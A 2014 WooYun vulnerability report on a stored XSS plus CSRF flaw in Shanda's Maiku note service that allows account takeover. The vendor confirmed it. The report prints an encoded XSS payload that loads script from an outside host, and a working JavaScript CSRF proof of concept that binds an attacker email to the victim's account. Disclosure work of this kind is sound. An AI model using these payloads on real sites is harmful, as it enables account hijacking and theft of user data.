当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078928

漏洞标题:盛大麦库-存储Xss + Csrf 控制别人账户

相关厂商:盛大在线

漏洞作者: 巭孬嫑夯昆

提交时间:2014-10-11 12:11

修复时间:2014-11-25 12:12

公开时间:2014-11-25 12:12

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-11: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-10-21: 细节向核心白帽子及相关领域专家公开
2014-10-31: 细节向普通白帽子公开
2014-11-10: 细节向实习白帽子公开
2014-11-25: 细节向公众公开

简要描述:

盛大在线:最新状态:2014-10-10:已修复
Ps:看到厂商说已经修复了,那就看看修复情况。。

详细说明:

提示厂商说修复了,吃完夜宵无事可干,就看了一下。
这修复的漏洞的程序员是不是偷懒啊,说哪个有问题就只修复哪个,都不全面检查一下的吗。
然后吧,配合上次管理没审核的时候挖掘的csrf控制别人账户的问题,就再来发一帖。

漏洞证明:

#1>>首先看一下上次xss的方法还行不行(厂商:都修复了,看你妹啊!),Ps:确实不行了。。
#2>>以前用别人的xss平台,今天自己搭建了一个,里面方便使用有一个供复制的。So,复制、粘贴。
Xss payload

<img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fwww.woshimaisaike.com%2FoWaKwi%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>


#3>>换浏览器开小号测试帖子,成功。。。。

note1.jpg


#4>>上次发麦库xss漏洞的时候,就随便弹了个窗,结果煎熬的等了几天才审核,这几天让我度日如年,然后就深入了下。[我的麦库>工具>邮件绑定快存]
用小号把大号的Email写了进去,抓包。

note3.jpg


就一个参数,其他也没什么验证。。
Csrf Poc:

var pkav={ ajax:function(){ var xmlHttp; try{ xmlHttp=new XMLHttpRequest(); }catch (e){ try{ xmlHttp=new ActiveXObject("Msxml2.XMLHTTP"); }catch (e){ try{ xmlHttp=new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){ return false; } } } return xmlHttp; }, req:function(url,data,method,callback){ method=(method||"").toUpperCase(); method=method||"GET"; data=data||""; if(url){ var a=this.ajax(); a.open(method,url,true); if(method=="POST"){ a.setRequestHeader("Content-type","application/x-www-form-urlencoded"); } a.onreadystatechange=function(){ if (a.readyState==4 && a.status==200) { if(callback){ callback(a.responseText); } } }; if((typeof data)=="object"){ var arr=[]; for(var i in data){ arr.push(i+"="+encodeURIComponent(data[i])); } a.send(arr.join("&")); }else{ a.send(data||null); } } }, get:function(url,callback){ this.req(url,"","GET",callback); }, post:function(url,data,callback){ this.req(url,data,"POST",callback); } }; if(!window.__x){ pkav.post("http://note.sdo.com/account/addEmail","email=我是马赛克@qq.com",function(rs){}); window.__x=1; }


note4.jpg


点击链接之后,直接可控制此账户,无需重新登录。。

修复方案:

全面检查修复。

版权声明:转载请注明来源 巭孬嫑夯昆@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-10-11 12:14

厂商回复:

谢谢报告,哥们,换个其他站看看,不要老报XSS!

最新状态:

暂无